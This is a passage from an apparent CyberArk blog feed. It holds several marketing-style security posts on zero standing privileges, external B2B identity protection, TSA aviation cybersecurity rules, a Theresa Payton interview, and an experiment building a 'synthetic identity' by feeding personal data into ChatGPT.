Baking tip: For the tastiest frosting, cater to the tastes of your development teams. Many engineers prefer to use native tooling from AWS, Azure and GCP. Allowing for the rapid ‘retrofit’ of credential management to cloud-native secret stores can keep developers happy – and secrets secure.

Intelligent privilege controls are vital ingredients within every layer of a multi-cloud environment. With a layered approach to securing privileged access, organizations can develop a powerful recipe: user-friendly security that doesn’t slow down engineering velocity. That’s quite the achievement – although maybe not as impressive as a warm, rich chocolate cake – but an impressive output, nonetheless.

To learn more about all layers of the multi-cloud identity security cake, feast your eyes on the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.

Sam Flaster is a director of product marketing at CyberArk.

]]>
Making Zero Standing Privileges a Reality https://www.cyberark.com/blog/making-zero-standing-privileges-a-reality/ Fri, 28 Jul 2023 17:46:37 +0000 https://www.cyberark.com/?p=181042 Zero Standing Privileges a Reality

The most significant change in the lifespan of identity security thus far is zero standing privileges (ZSP). Considered to be the next evolution of just-in-time (JIT) access, although it may seem needlessly complex at first, once you wrap your head around the concept, it feels as natural as turning off lights when you leave a room.

But first, a bit about me and the journey to ZSP.

I’m lucky enough to have thus far had a diverse career in tech that’s had me in a series of roles, from being an engineer to working with advisory consultants. During my time building infrastructure at scale, there’s been a constant demand for concepts that address the risk posed by privileged access without impacting ops productivity. As it turns out, years later, as I led CyberArk’s Strategic Alliances Solutions Architecture practice, I saw this exact challenge from another viewpoint. People want to behave in a way that keeps their organizations safe, but they expect to remain productive – not blocked by intrusive controls.

The ZSP concept meets that need.

The Journey to Zero Standing Privileges

Least privilege (or the principle of least privilege (PoLP)) is always a no-brainer. If you don’t need access, you should not have access.

I ran a team of operations engineers many years ago supporting a large-scale Infrastructure-as-a-Service (IaaS) platform. In looking at what we could do to improve the security of our platform, least privilege made perfect sense to us – it felt like a boundary that defined if something was in scope for our team or not.

Zero Standing Privileges
A glimpse, from the author’s perspective, of 400 servers – or about 2% of the platform managed by his team in 2013.

We ran with the principle of least privilege – piloting various implementations and methodologies. But ultimately, that least privilege journey fell flat. The team, comprised of what would now be called platform or site reliability engineers, had massive hesitance to give up the access rights they felt they might need during an incident. Any team dealing with a critical situation is very familiar with the idea that it’s hard to build a technical plan for ‘when it goes wrong.’ Things never break in the way you expect.

In looking for the next concept that might allow us to improve the security of our platform, just-in-time (JIT) access was an easy winner for us. The only thing holding us back was our collective ‘when it goes wrong mindset’ where, during a critical situation, we’d often want to troubleshoot at a large scale across the entire platform, potentially accessing hundreds of servers, routers and switches to identify the issue. This wasn’t an unreasonable concern, but one that could be exploited by any attacker present.

As it turns out, I left the organisation before anyone definitively figured out the correct solution. I considered it a real miss that I never actually determined the right way to improve the identity security of our platform.

The reality was that we needed something that combined these concepts with consideration for the operational impact. This is where the concept of ZSP becomes highly relevant.

What is Zero Standing Privileges?

In short, ZSP evolved from JIT access because it was a necessity. Simply turning on and off administrative access for a user didn’t offer enough risk reduction for many modern enterprises.

ZSP is the concept that an identity sits with no entitlements on the resource it will be used to access – until the identity is needed and entitlements are requested. When granted, those permissions are only the ones required. It’s giving access to the right people at the right time – no more and no less. This represents a massive attack surface reduction as the account itself is now useless – even if an attacker could log in, they can’t do anything because they have zero permissions!

As such, ZSP is an excellent concept, sitting at the intersection of JIT access and least privilege. It addresses those frustrating ‘what-ifs’ that held me back due to the requirement of rapid access grants.

Zero Standing Privileges.
The author attempts to bypass a cloud provider’s controls to demonstrate the power of ZSP.

Zero standing privileges add further protection to just-in-time as a concept. With JIT access, you’ll be unable to enable just the right number of privileges to that account. This is arguably the core requirement of ZSP.

Only allowing an account to have the privileges it needs by exception rather than standing entitlements and returning it to no privileges puts you in a situation where you can minimise that account’s exposure. Elevating access just-in-time does reduce the risk of credential theft. But, once access is provided, internal or external bad actors have more entitlements to exploit, enabling lateral movement and privilege escalation. A ZSP approach also reduces the volume of systems or services an attacker could compromise when they gain access. This is easily one of the most effective strategies for reducing risk.

How to Make ZSP a Reality

First, you’ll need to find a way to handle elevation, a mechanism to align a user to a group of permissions. For a realistic chance of adoption, elevation mechanisms must be integrated into service management or ChatOps to speed up the handling of approvals.

You’ll also need to move away from thinking in the binary ‘is this an admin or not’ mindset and consider how the user access level poses a risk and find tooling to manage that. The distinction between privileged and non-privileged access is nebulous in modern Infrastructure as a Service (IaaS) environments. Lastly, you’ll need to ensure that whatever permissions you grant get removed as soon as the session ends.

If you’re looking for a modern, dynamic way to secure access in your cloud platform (as I once was), check out the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.

Josh Kirkwood is a senior product marketing manager at CyberArk.

]]>
Five Ways to Secure External Identities https://www.cyberark.com/blog/five-ways-to-secure-external-identities/ Fri, 21 Jul 2023 15:13:30 +0000 https://www.cyberark.com/?p=180487

If you stick with any movie through the end credits, you’ll see – not just the household names who act and direct – but the full scope of players who make a film happen. The scroll can seem endless: writers, CGI designers, location scouts… animal handlers and the illustrious “best boy grip.” It’s a wide-ranging ecosystem where everyone plays a role. And it’s very similar to the high-stakes cloud and digital initiatives that today’s enterprises are driving forward – and today’s attackers are targeting.

A successful transformation requires a diverse cast. Securing them calls for a closer look at who has risky levels of access to sensitive resources. It’s not only the IT employees working in critical environments. And it goes beyond the sharp increase in everyday employees accessing sensitive data in applications.

Roll the credits for any top enterprise initiative, and you’ll see an ecosystem of contributors from outside the workforce who also need access to internal resources, to do their jobs. The scroll would look something like this:

  • Vendors
  • Suppliers
  • Contractors
  • Partners
  • Clients
  • Agencies
  • Franchises
  • Affiliates
  • Dealerships

Every day, external business-to-business (B2B) contributors use enterprise-provided applications, portals and services from various devices and locations. And attackers know it.

External B2B Users: Key to Success and Key Attack Targets

Consider how many outside contractors work for your organization and imagine just one falling victim to a phishing attack. A malicious actor tricks them into sharing their password for an enterprise app, digs around until locating high-value resources and makes a devastating next move. It’s a movie we’ve seen, but the script is flipped – to entail third-party vulnerabilities that are hard to control.

One example: an insurance company’s extended workforce of third-party agents who use the company’s online portals on the road – one compromised identity could result in the data of millions of policyholders being leaked. For a private hospital system’s network of electronic healthcare data vendors, this type of attack could result in a central database of patient records being held for ransom.

“It’s a movie we’ve seen, but the script is flipped – to entail third-party vulnerabilities that are hard to control.”

And that’s just considering external B2B users who are actively working with organizations.

Third-party risk often stems from B2B users who no longer work with an organization but still have lingering access to its applications, data and environments. IT security teams are already bogged down with manual processes for managing full-time employees’ access. The complexity grows when considering external users. One missed step in a manual, error-prone offboarding process can allow threat actors to exploit inappropriately provisioned, overprivileged or orphaned accounts.

How to Provide Protection and Positive UX for External Collaborators

Across any industry or use case, there’s a common link: external B2B users need as fierce protection as your employees. In addition, their user experience in accessing your applications and resources must be designed to help them succeed. Here’s a brief look at five areas of best practices to help you achieve that balance.

1. Ensure Secure, User-Friendly Access to Applications

A frictionless experience is essential for external B2B users when they authenticate into applications to engage with your organization. This helps vendors and contractors do their jobs; it also helps ensure that clients and partners view your brand favorably. But how can you achieve these outcomes without sacrificing security? Here are a few building blocks to keep in mind:

  • Allow external users to access applications with a single set of corporate credentials via intelligent single sign-on (SSO), reducing password usage.
  • Verify users with adaptive multifactor authentication (MFA) that draws context from user behavior analytics to determine whether a log-in attempt is low- or high-risk – and, in turn, provide easy or difficult authentication factors.

2. Bring Structure to Identity Data Storage and Management

As your organization’s digital and cloud initiatives grow in scope and scale, the number of external B2B identities requiring protection is surging and disparate. So, how can you ensure their information is accounted for and protected while not making things difficult for partners? Here are some best practices:

  • Store identity information for external B2B users in a secure, centralized repository.
  • Allow external B2B organizations’ admins to use their trusted identity providers to authenticate end users via a cloud-hosted directory service that supports identity federation.
  • Simplify administration tasks and oversights while helping eliminate adoption barriers among external partners’ IT and security teams.

3. Balance Flexibility with Security in Identity Administration

It’s challenging enough to stay ahead of identity administration for employees. The job can feel unwieldy when factoring in external users. You can reduce the burden and risks of third-party identity administration by giving partners a mix of autonomy and security-first features, including:

  • Provide external B2B partners’ IT teams with a hierarchical, multi-tenant delegation model that allows admins to manage identity data across a shared environment.
  • Introduce an overall tiered approach through which a designated partner admin can manage their end users, overseeing their access rights as roles change over time.
  • Delegate administration responsibilities to peer admins and trusted non-admin users (as needed).

4. Automate Processes and Tasks for Managing Identities

Automation can help IT security teams escape from the pattern of manually connecting dots and scripting integrations between variables like data and applications. The same applies to manual procedures and workflows for granting, adjusting or revoking access.

Here are some examples of how automation can help IT security teams regain bandwidth and reduce risk:

  • Provision access automatically and manage entitlements throughout your external B2B users’ lifecycles, from onboarding to offboarding.
  • Bolster defenses around siloed applications with custom security features and standardize your approach across apps through a simplified security model.
  • Eliminate manual tasks with flexible workflows and automated orchestration of data, processes, tasks and events.

5. Secure Access for Third-party Privileged Users

While the nature of third-party risk has expanded beyond the traditional definition of privilege, it remains critical that organizations secure the identities of external users with the highest levels of sensitive access.

Take, for example, an IT user working for one of your vendors. If this user’s identity is compromised, the attacker’s next steps – e.g., lateral movement and privilege escalation – aren’t limited to the vendor’s environment. They’re a stepping stone to yours. Here are a few capabilities and controls that can help you secure third-party privileged access:

  • Ensure privileged users from external vendors confirm their identities each time they need to access critical assets via biometric MFA.
  • Implement just-in-time (JIT) provisioning for vendors when they need to access business applications and sensitive information.
  •  Gain full visibility into vendor activities via privileged session monitoring, with complete reporting, auditing and remediation capabilities.

Next Steps: Achieving High-Quality UX and Security-First Access Balance

The cast of characters playing essential roles in driving your high-stakes initiatives continues to grow in number, scope and risk. Keeping their identities secure is essential for preventing third-party breaches and attacks – and for protecting everything these external B2B users are building for your enterprise.

Similar to the movies, this blog post has a director’s cut with additional content. For a deeper dive look at the controls and capabilities needed to protect external B2B identities, read our recent whitepaper, “Secure Your External Users’ Access to Enterprise Applications.”

John Natale is a senior content marketing manager at CyberArk.

]]>
Preparing for TSA Cybersecurity Compliance with Identity Security https://www.cyberark.com/blog/preparing-for-tsa-cybersecurity-compliance-with-identity-security/ Tue, 18 Jul 2023 15:45:03 +0000 https://www.cyberark.com/?p=180292 An image of a plane in the sunset sky

The aviation industry relies on a complex web of players and digital systems to fly passengers safely around the world. Billions of data points flow across this vast interconnected ecosystem – from cloud-based ticketing apps and customer experience portals, to third-party vendors and technology systems, to airport ground operations and in-flight aircraft.

While connectivity is mission-critical to airline and airport operations, it also means that any cyberattack or digital disruption could quickly ripple outward, negatively impacting numerous entities, degrading customer experiences and potentially even compromising human safety.

Just last month, two major airlines disclosed data breaches caused by a cyberattack on a third-party recruiting vendor. According to reports, personal information of nearly 9,000 airline pilots was exposed. Unfortunately, this wasn’t an isolated incident. Cyberattacks on airlines, airports and their many third-party providers are rising globally. As with other critical infrastructure sectors, transportation’s risk exposure is heightened by technical complexity, underlying infrastructure issues and vulnerable operational technology (OT).

A string of distributed denial-of-service (DDoS) attacks last fall temporarily took down several major U.S. airport websites. In February 2023, seven German airports experienced a similar attack that left thousands of travelers stranded. Airports across the European Union (and everywhere else) are being hit hard by ransomware, according to a 2023 report by the European Union Agency for Cybersecurity. The same report identifies airlines’ customer data and original equipment manufacturers’ proprietary information as cyberattackers’ top targeted assets.

Building Cybersecurity Resiliency for Airport and Aircraft Providers

Such targeted attacks on critical infrastructure are prompting government action. In the United States, the Transportation Security Administration (TSA) has called on airports and aircraft providers to step up their cybersecurity practices.

According to enhanced TSA requirements released this March, all TSA-regulated airports and aircraft providers must “develop an approved implementation plan that describes measures they are taking to improve their cybersecurity resilience and prevent disruption and degradation to their infrastructure.” TSA released similar requirements in 2022 for passenger and freight railroad carriers. Both steps are part of a broader push to strengthen the cybersecurity resilience of the nation’s critical infrastructure and align with the Biden administration’s Zero Trust-focused National Cybersecurity Strategy.

Preparing to Meet TSA’s Enhanced Cybersecurity Requirements

Airport and aircraft operators must take four actions to meet TSA’s latest cybersecurity requirements. While specific details on mandatory security controls, assessment parameters and compliance deadlines have not yet been disclosed, many TSA-regulated entities are referencing Security Directive 1580/82-22-01 for the railroad industry as they prepare for their own directive. In the meantime, they have this high-level guidance from TSA:

Action 1: Network Segmentation

“Develop network segmentation policies and controls to ensure that operational technology systems can continue to safely operate in the event that an information technology system has been compromised, and vice versa.”

Network segmentation is an important step for limiting access to devices, data and applications. In the aviation industry, operational technology (OT) networks power everything from airport baggage-handling systems to critical air traffic control processes. Creating boundaries between OT and IT networks helps minimize identity-based threats, such as phishing, ransomware and other credential theft attacks. Network segmentation also separates and protects OT network layers while allowing authorized communications and other critical processes to continue.

Action 2: Access Control

“Create access control measures to secure and prevent unauthorized access to critical cyber systems.”

The aviation sector is in a continuous state of digital transformation and identities – human and machine – are surging in numbers. Across industries, virtually all (99%) security decision-makers believe they’ll face an identity-related compromise in the year ahead, reinforcing the need for a Zero Trust approach to security.

Modern identity security controls, centered on privilege, enable Zero Trust by verifying every user, validating every device and intelligently limiting access to any resource anywhere, everywhere. This includes continuous authentication to validate a user’s entire session – not simply a single multi-factor authentication (MFA) request – and monitoring user behavior to identify when an identity has been compromised. This brings us to TSA’s required action number three.

Action 3: Continuous Monitoring and Detection

“Implement continuous monitoring and detection policies and procedures to defend against, detect, and respond to cybersecurity threats and anomalies that affect critical cyber system operations.”

With so many distributed workforce and privileged users, third-party vendors and data streams in play, aviation organizations need a centralized, continuous process to detect risky security events and behaviors. Otherwise, context and coverage gaps could cause them to miss, mishandle or respond too slowly. Identity security solutions that continuously monitor behavioral signals help ensure users are who they say they are, while empowering incident response and security operations teams to address threats quickly and confidently.

Action 4: Patch and Manage Critical OT Connections

“Reduce the risk of exploitation of unpatched systems through the application of security patches and updates for operating systems, applications, drivers and firmware on critical cyber systems in a timely manner using a risk-based methodology.”

Keeping critical airport and airline systems patched and up to date is an essential defense-in-depth endpoint security component. But human error has no patch. Combining patch management and other traditional endpoint security tools with foundational endpoint privilege security will help strengthen overall security posture and reduce exposure to ransomware and other dynamic threats.

How Aviation Organizations Can Strengthen Cyber Resilience

Navigating evolving cybersecurity requirements can be complex, but airports and airlines don’t have to go it alone. CyberArk can provide the guidance and support needed for these critical infrastructure organizations to comply with TSA’s enhanced requirements to protect information and systems.

The CyberArk Identity Security Platform is uniquely positioned to help them strengthen cyber resilience by surrounding every identity – human and machine – with a powerful force field of continuous protection. With a security-first approach grounded in Zero Trust and least privilege, CyberArk enables them to manage who has access to what, and for how long, while empowering them with the confidence of unmatched detection, prevention and control over their entire infrastructure.

Jay Willoughby is AVP Commercial Sales – U.S. at CyberArk.

]]>
Theresa Payton on Identity Threats and the Chief ‘Influence’ Security Officer https://www.cyberark.com/blog/theresa-payton-on-identity-threats-and-the-chief-influence-security-officer/ Thu, 13 Jul 2023 17:45:36 +0000 https://www.cyberark.com/?p=180068 Theresa Payton on Identity Threats

You’re reading the CyberArk blog (and we thank you for that), so you’re likely familiar with the name Theresa Payton. The cybersecurity visionary, first female White House CIO, best-selling author and founder and CEO of Fortalice Solutions is a powerful industry voice, blending her frontline cybercrime fighting experience with cutting-edge insights to help organizations safely navigate the evolving threat landscape.

Not long ago, I had the honor of speaking with Payton on the CyberArk Trust Issues podcast. We covered so much ground – from revisiting major historic threats to exploring ransomware’s impact and future AI applications – that we dropped two episodes. Give part one and part two a listen and check out these top takes from our conversation.

Yesterday’s Threats are Still Alive and Well

Payton served as CIO in the George W. Bush White House from 2006 to 2008 – a time of significant technological change in the workplace and at home. Among other major happenings, Apple released its first-ever iPhone and social media was starting to take off. Here’s what Payton had to say about the threat landscape during this time and its lasting influence.

Theresa Payton: We didn’t know how good we had it, even though cybercriminals were doing some pretty bad things. Major cybersecurity threats looked like phishing scams, spam emails, botnets. Malware was very quaint and SQL injection attacks were extremely popular. Nation states and syndicates were operating at a different level, mainly focused on the defense industrial base and government organizations. They weren’t going after the small, medium and large enterprises as they certainly do today. Even things like ransomware, which was in its infancy, mostly focused on computers in a network. It wasn’t at the large scale seen today. But what’s interesting to me is that phishing scams and spam email are still alive and well. We can’t seem to get rid of them. Botnets are still used and malware is still built to steal information and conduct other nefarious types of activities. And the fact the SQL injection attacks still work – that’s incredible to me.”

Technology Multiplies Misinformation Campaigns

Fast-forward to present day. The threat landscape continues to grow in size and complexity, and digital advancements bring new twists to age-old misinformation and fraud schemes.

TP: “It’s part of human nature to manipulate and misinform others to get them to see your point of view. Social media gave those with nefarious intents a free stage. All they had to do was understand how search engine optimization and hashtags work to launch their own amplification marketing campaigns. In some regards, I think retailers and other companies would marvel at what misinformation experts can accomplish with very little money. This has led to a rapid spread of misinformation on all types of topics – everything from pump-and-dump schemes for cryptocurrency, health, politics, science and deepfake technology. All of these can be used to create fake news, propaganda and disinformation. Artificial intelligence raises the stakes. We’ve already seen how AI helps botnet masters much more effectively manage their botnets. Having ChatGPT and other deepfake AI tools really just puts more power in the hands of the manipulators and mis/disinformation peddlers. It’s making it really challenging.”

Payton notes that we each play a part in fighting misinformation – by watching out for one another, learning how to spot disinformation campaigns and reporting inauthentic behavior and dangerous disinformation to social media platforms.

Photo of Theresa Payton, Founder and CEO of Fortalice Solutions, along with an accompanying pull quote from the article.

Hiring for Open Positions? Beware of ‘Franken-Fraud’ Identity Applicants

The recently published CyberArk 2023 Identity Security Threat Landscape Report finds that 93% of security professionals expect negative cyber impacts from AI tools in 2023 – and with good reason. Payton believes that thanks to AI, it won’t be long before ‘franken-fraud identities’ (also referred to as synthetic identities) enter the workforce.

TP: “Fraudsters and scammers will leverage cutting-edge deepfake AI technology to create personas – by creating images of these new identities, adding voices to them, creating videos, etcetera. In fact, all of this can be done mostly for free today. These ‘persons’ will use AI and big data analytics to test themselves and ensure they look authentic. The next thing you know, you’ve got ‘people’ who can interview for jobs. And since many jobs today are remote, companies may unknowingly hire a deepfake persona because it’s been matched up with a franken-fraud identity. Seriously – it can happen.”

“So how do you protect against this? For starters, you must understand how to safeguard your executive and employee data. Second, if you do remote hiring, work with an outsourcing firm to bring candidates into a physical office in whatever geography they’re in. Have them present different forms of identification. It’s not going to cost you that much and it’s a way to make sure you’re actually hiring the person you think you’re hiring.”

One Ransomware Trend Theresa Payton Never Saw Coming

Many organizations have benefitted from Payton’s near-prescient ability to predict cybersecurity trends and challenges ahead. She imagines how things will look two to three years out every year, and she’s usually spot on. Yet one recent development caught her completely off guard.

TP: “I love to study human behavior and technology implementations, so I typically have a pretty good handle on where things are headed. But I would’ve never predicted that insurance companies would encourage ransomware victims to pay ransoms. I remember the first time somebody told me that their insurance company said to pay the ransom because it would be cheaper than recovery. I said, ‘Well, that sends a really bad message. It’s like giving the schoolyard bully your lunch money. They’re just gonna come back tomorrow.’ When I looked in a crystal ball, I definitely saw a lot of the trends and patterns coming. But I never saw that one.”

On Double Extortion and Evolving Attacks

Unfortunately, the paying ransom trend only seems to be growing. CyberArk’s latest research found nearly three-quarters of organizations paid ransoms at least once in the last 12 months. Payton acknowledges that attackers are turning up the heat with double extortion but urges organizations to remember who they’re dealing with.

TP: “You are negotiating with a criminal. And even if the person you negotiated with might keep their word as an individual, which is debatable, it’s so distributed and outsourced these days that somebody else in the organization may not honor their word.”

“When we improve the kill chain in our resiliency and our recoverability, cybercriminals don’t say, ‘Wow, this is really hard. I should give this up and become a park ranger or bake pies for my neighbor.’ They just up their A game too. They don’t go away. That’s the great thing about cybercriminals, whether it’s a nation state, lone wolf or a cybercriminal syndicate – their behavior.”

So as organizations improve their ransomware defenses and recovery efforts, where will attackers turn next? Payton offers a rather grim prediction.

TP: “The better we get at shutting down ransomware syndicates on systems and data, malicious cyber actors will move to another place in the kill chain. Ransomware will pivot to the Internet of Things, devices, access control cards, thermostats, TVs, physical buildings controlled by computers – you name it – and hold them for ransom.”

Payton writes in her 2024 cybersecurity predictions that attackers could go as far as “hacking into intelligent buildings, locking them down with people inside and demanding a hostage payment to release individuals.”

Putting the “Influence” in CISO

Chief Information Security Officers (CISOs) have a difficult job that’s constantly changing as technology, workforces and cyber threats evolve. Many CISOs are understaffed and under-resourced. They’re grappling with highly complex IT environments and exponential – but often insecure – identity growth. Payton encourages these cybersecurity leaders to expand and solidify their influence across their organizations to amplify their impact.

TP: “As a CISO, you will never have the full span of control that you probably should have to protect all the digital assets under your organization’s care. You’re never going to have enough tools and budget and people. And you really do need to understand that. Once you do, ask yourself how you can influence your organization to be secure by design.”

“Are you going to sit with the developers the whole time? Are you going to sit with the third-party marketing firm doing internet campaigns with social media platforms? No. So how do you make sure you have influence everywhere within the organization. You can’t do it by being a bottleneck and saying no to everything. You do it by understanding the mission and values of your organization and figuring out the human user stories of your employees, customers and third-party vendors. Then, you focus on where things need to be secure and how to influence the people responsible for those human user stories. That is where CISOs need to go with their thinking. If you don’t wake up every morning thinking about that, in addition to what you’re doing today, you’re going to miss a unique opportunity to have a long-lasting legacy and impact.”

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

Editor’s note: Remarks have been edited for length and clarity. To listen to the entire Trust Issues interview with Theresa Payton, check out the players below – or find the episodes wherever you get your podcasts.

]]>
Synthetic Identity: When AI and ML Crunch (Your) Harvested Data https://www.cyberark.com/blog/synthetic-identity-when-ai-and-ml-crunch-your-harvested-data/ Thu, 06 Jul 2023 17:56:51 +0000 https://www.cyberark.com/?p=179984 synthetic identity AI ML

ChatGPT knows a lot about Len Noe, CyberArk’s resident technical evangelist, white hat hacker and biohacker. The biohacker piece of his title is a nod to the fact that Noe is transhuman (you might call him a cyborg and be right), which is why his grandkids call him “Robo Papa.”

ChatGPT knows all of this.

That’s because Noe fed everything he could find about himself that’s publicly available on the internet and by way of open source information technology (OSINT) into ChatGPT, all for the sake of cybersecurity research. These inputs included places he’s lived, auto registrations, utility bills, social media posts and transcripts of presentations he’s given and interviews he’s done. If it’s out there in the digital world, Noe plugged it into ChatGPT. What he wound up creating is a digital version of himself – what he refers to as his synthetic identity.

And, as Noe explains it, this synthetic identity – the identity that’s born from the blurring of physical and digital characteristics used to identify individual human beings – is permanent. The more you share online, wherever and however it may be, the more breadcrumbs you leave for attackers to someday, somehow use for nefarious purposes.

This is why Noe has created his own synthetic identity – as an extension of his ongoing effort to think like attackers – and, in doing so, stay a step or more ahead of them. “I was actually able to interact with a digital version of myself that had understanding, as well as information about my physical existence,” he told me in a recent episode of CyberArk’s Trust Issues podcast.

Screen captured video of Len Noe combing for his own publicly available information via OSINT.

Feeding Harvested Data into ChatGPT for Synthetic Identity Creation

At first blush, Noe’s ChatGPT experiment seems like doxing – the malicious act of curating and publishing identifiable information about a person or organization on the internet without their consent. But there are two big differences. First, the synthetic identity Noe created is based on his own personal data, and second, ChatGPT’s AI engine has the superhuman processing power to fuse disparate data points together instantaneously.

“All those little bits and pieces of [personally identifiable] information are spread out across multiple, different databases, so it’s very hard to make correlating points between them,” Noe says. “But if you take all of that information and put it into ChatGPT – something that’s main intended purpose is to find those types of correlations…” Noe trails off, but the implications are clear. Machine learning (ML), powered by artificial intelligence (AI) can make all sorts of connections about a person, and in doing so, expose them to significant risk.

In feeding all of that unprotected, harvested data into the ChatGPT blender, the output could take doxing to the next level. And the readily accessible opportunities for attackers lie in a swelling digital ocean of identities. The data correlations made possible through AI can make it much easier for attackers to deduce potential targets’ passwords and recovery questions. In a blink, AI can extract or deduce your mother’s maiden name or the street you grew up on – or most any typical standard question/answer for self-service recovery portals. And once it has that information, let the games begin.

Screen captured video of Noe interacting with his synthetic identity after inputting lots of his own publicly available data into ChatGPT.

Simple data extraction is just the tip of the AI iceberg, as it were. Attackers, of course, won’t (and don’t) limit themselves to what’s available. Our digital lives make it easy for the likes of advertisers and social media platforms to build composites of people’s identities based on their online behaviors and preferences. These digital dossiers are routinely sold and shared – and can also be intercepted.

This is how the potential for next-level, primo opportunities arise for attackers. Just think of the imitation opportunities alone. The creation of a synthetic identity can fuel spoofing, phishing and impersonation, by aiding attackers in producing more realistic human speech and text patterns and, in turn, convince someone to share or do something they shouldn’t. Once that’s been obtained, cyber extortion can enter the fray. The more personal data attackers can harvest, the more successful they are likely to be – and the more they will try to take.

“Think about the information that could be accessed with the data collected by the big tech miners,” Noe says. And, of course, as practitioners of “assume breach,” we must think about it. Data science, he says, requires thinking outside the box, problem-solving and analytical thinking. Attackers take a similar approach.

Noe adds, “Everything is asking our physical identities to attach more and more digital services to our digital identities. Every time we add a new app to our mobile devices another piece of software is asking for permissions to reach deeper into our private lives. Our individual attack surface is literally everywhere.”

Everything Ties Back to Identity

Noe acknowledges the potential for this new type of synthetic identity threat is yet to be fully realized. But as a cybersecurity practitioner whose job requires him to put himself in an attacker’s shoes, he’s constantly considering potential threats and ramifications. And they almost all inevitably involve data and identity.

Putting it into context, Noe says, “We hear about identity theft, identity monitoring, identity validation and identity security. Everything’s tied to identity and with good reason. Our identities are the most valuable thing we possess – it’s our likeness, our voice, behavior patterns. It’s our friends, family, hobbies, likes and dislikes. It’s what makes us.”

Your individual identity is an amalgamation of your physical and digital self, he contends. By this reasoning, your identity could potentially be put at risk through not just online interactions, but also how you interact in the physical world – like with your intelligent refrigerator or how you connect to home Wi-Fi, to point to just a couple of seemingly hundreds-to-zillions of other linked actions. We’re at the point where there is no separating these two sides of self – they are inextricably merged.

Everything Ties Back to Identity

Who is Len Noe? Identity as a Guiding Principle

Let’s acknowledge again that Len Noe is transhuman by way of implanted chips and devices. Not that there’s any such thing as an ordinary human identity – we all have our own singular defining features and characteristics. But the tangled irony of focusing on the subject of identity with Noe is that his own identity is inherently complex. As we’ve chronicled here on the CyberArk blog and on our podcast in the past, Noe’s implants are for the sake of attacker-like experimentation – he doesn’t just think like an attacker, he’s altered his actual physical being in an ongoing effort to stay ahead of them. But you wouldn’t know it to look at it.

I’m standing with Noe as we await entrance to the Boston House of Blues for a company party capping Day Two of CyberArk’s IMPACT23 conference. It’s a mild early evening in May, amid a protracted New England spring that seemingly wants to Benjamin Button its way toward winter. Noe’s wearing short sleeves, revealing tattooed sleeves on both arms. We’ve spoken in the past about the various microchips and other implanted devices (with varying functionality) he has beneath his skin, but this is the first time I’m experiencing them, as he pinches his skin so I can see a couple of them silhouetted beneath the surface.

To get into the House of Blues, Noe flashes a standard-issue ID and an event-only wristband, just like all the standard-issue human attendees.

The Work-Life and Home-Life Identity Overlap

Work happens everywhere, anywhere. This means that, among other things, lines separating “work” devices and online identifiers from “personal” ones are blurred or have completely vanished. And attackers know this.

“As an attacker, why would I go after your corporate asset that I know has multiple layers of security controls on it, when I know you’re conducting business activities on an unprotected personal device?” says Noe. “It’s much easier for me to just target your own computer – then I can just ride the applications in the private tunnels back to the enterprise.”

Company-owned devices also present risks. “What’s the first thing that’s going to happen when a work laptop walks out of a corporate environment? It’s going to be connected to a home WiFi network,” Noe says. “Once these things leave the corporate environment, they’re out in the wild and it’s up to security professionals to keep security in the front of users’ minds so they remain vigilant, realizing everything out there is trying to get in and that they play an important role in keeping them out.”

Synthetic identity could come into play in a variety of ways within this context. For instance, a synthetic identity could be used to subvert a corporate network by way of the home network using data correlated through AI. Or, that synthetic identity could spoof individuals to cough up passwords for personal accounts that might be similar to (or exactly the same as) those used for corporate applications. Like, let’s say you were successfully phished and shared your Netflix password, which happens to be the same password you use for your enterprise Office 365 account.1 Game over. Although, of course, it’s not a game.

Stop Spreading Digital Breadcrumbs – Secure Your Digital Identity

So, what can individuals and organizations do to stem the threats posed by AI and ML-assisted synthetic identities? Noe suggests the following:

4 ways to protect your digital identity: • Curb information sharing online. Does X Brand really need the information they’re asking for? Is that social media quiz prompting you for identifying information that could be used to guess a password? • Download with caution and limit app access. Be aware what permissions an app requests before downloading. Does it really need access to things like your camera, microphone and contact list? • Secure your home network. Use a strong, complex password for your router and change it regularly. Always keep firmware and software patches up to date. • Get away from direct log-in. For personal online use, always enable multi-factor authentication (MFA). For work, enterprise-grade protection should be single sign-on (SSO) with adaptive MFA on the front end.

Noe stresses that for MFA, “The best option we have is a true adaptive multifactor to validate that I am the person that I say I am. Multifactor does not mean two-factor – two is a minimum. And from an enterprise perspective we need to start looking deeply into the crossover between personal and business.”

With individual identities comprised of countless digital data points that are ultimately tied to physical beings, everything is more connected than it’s ever been. And now there’s widely available technology to connect the dots at scale. In a time considered to be an AI gold rush, while the technology itself is still at a relatively early stage, securing our identities, at work and home – everywhere – is paramount.

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

For more from Len Noe on synthetic identity, check out his recent Trust Issues podcast conversation.

 

1 You know not to repeat passwords, so please don’t do it. Check out this blog post for an eye-opener on password protection.

]]>
Data Sovereignty: Balancing Residency Requirements and Access Rights https://www.cyberark.com/blog/data-sovereignty-balancing-residency-requirements-and-access-rights/ Fri, 30 Jun 2023 15:45:12 +0000 https://www.cyberark.com/?p=179869 International flags to depict data sovereignty focus of the accompanying blog post.

Global organizations – and the data they collect and use on a daily basis – exist today both within and beyond the traditional physical boundaries of countries. They may have cloud infrastructure that spans the world, but local laws and regulations can still have a big impact on how data needs to be stored and accessed, even if it’s in the cloud.

Data sovereignty is the idea that organizations need to consider the local laws in the region or country in which data is collected. While data sovereignty has grown in importance thanks to regulations like the General Data Protection Regulation (GDRP), companies have had to make considerations regarding data storage and usage well before that. The issue, however, has grown more complex in recent years with increasing regulation and other compliance events like sanctions, as well as macro trends like the continued move to the cloud.

Companies not only have to think about where their data is being stored. They also need an easy way to manage access to data on a region-specific basis and quickly pull audit logs to show compliance with various local regulations and laws.

A More Connected World … and a More Disparate One

Things used to be simpler in an on-premises-only world. Sure, you might have multiple operations in different countries. But for each new operation, you would set up new on-premises infrastructure, and your data would be siloed in that on-premises location in the country you were operating in.

But with modernization efforts and the move to cloud-native SaaS solutions, things have grown more complex for organizations. You might have enterprise-wide environments and infrastructure where data, including keys and other important credentials, are stored. Now you have to work with your SaaS vendors and cloud providers to determine what data you’re storing, where you’re storing it and who has access to those keys and credentials.

